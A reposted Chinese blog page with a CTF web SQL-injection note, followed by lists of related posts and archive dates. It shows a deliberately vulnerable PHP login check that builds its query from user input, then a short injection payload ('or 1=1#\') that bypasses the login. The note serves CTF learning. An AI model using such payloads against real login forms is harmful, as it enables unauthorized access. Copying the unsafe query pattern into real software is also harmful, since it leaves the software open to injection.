CTF web总结--sql注入 - 代码天地

CTF web总结--sql注入

其他 2018-08-21 02:13:37 阅读次数: 0

<?php
include "common.php";

if (isset($_POST["name"])){
  $name = str_replace("'", "", trim($_POST["name"]));
  if (strlen($name) > 10){
    echo("<script>alert('too long')</script>");
  }else{
    $sql = "select count(*) count from info where username = '$name' or nickname = '$name'";

    $row = my_mysql_query($sql);

    if ($row["count"]){
      $_SESSION["rank"] = "1";
      $url = "backup_56fe708ed9f57c959fa44e313687739f.tar.gz";
      echo $url;
      header("Location: ./route.php?m=login");
      exit();
    }else{
      echo("<script>alert('go go go go ...')</script>");
    }  
  }
}
?>

构造'or 1=1#\' 即select count(*) count from info where username = ''or 1=1#\'' or nickname = ''or 1=1#\''

猜你喜欢

转载自blog.csdn.net/qq_20817327/article/details/77725801

CTF web总结--sql注入

【CTF】SQL 注入总结

CTF 总结03：SQL注入

CG CTF-Web-SQL注入

二、CTF-Web-SQL注入（记录CTF学习）

CTF SQL注入

CTF – sql注入（1）

CTF – sql注入（2）

CTF-SQL注入

CTF之注入总结

CTF web总结

ctf web个人总结

CTF web小总结

bugku ctf sql注入2

ctf题库--简单的sql注入③

CTF-sql注入笔记

CG CTF SQL注入1

CTF学习笔记——SQL注入

BugKuCTF(CTF-练习平台)——WEB-SQL注入1

BugKuCTF(CTF-练习平台)——WEB-sql注入

【CTF整理】CTFhub技能树-Web-SQL注入

CTF web题总结--http header 修改、cookie注入

CTF web题总结--SSRF

CTF web题总结--unserizable

CTF web题总结--LFI

CTF--Web安全--SQL注入之Post-Union注入

ctf基础注入题

CTF之SSI注入

CTF-WEB文件包含及注入

实验 | CTF-web文件包含及注入

今日推荐

周排行

rac环境打PSU补丁ERROR:This patch is not applicable to GI home.

科学活动《离园倒计时》（时间）

Windows 沙箱开发踩坑

secureCRT 改变显示宽度

hdu多校第六场1008 （hdu6641）TDL 暴力

【low向】注册用户时密码强度的判定

__int64

context-params与init-params

JS三个编码函数和net编码System.Web.HttpUtility.UrlEncode比较

springboot通过重写addResourceHandlers拦截请求访问本地资源

每日归档

更多

2024-08-08(0)

2024-08-07(0)

2024-08-06(0)

2024-08-05(0)

2024-08-04(0)

2024-08-03(0)

2024-08-02(0)

2024-08-01(0)

2024-07-31(0)

2024-07-30(0)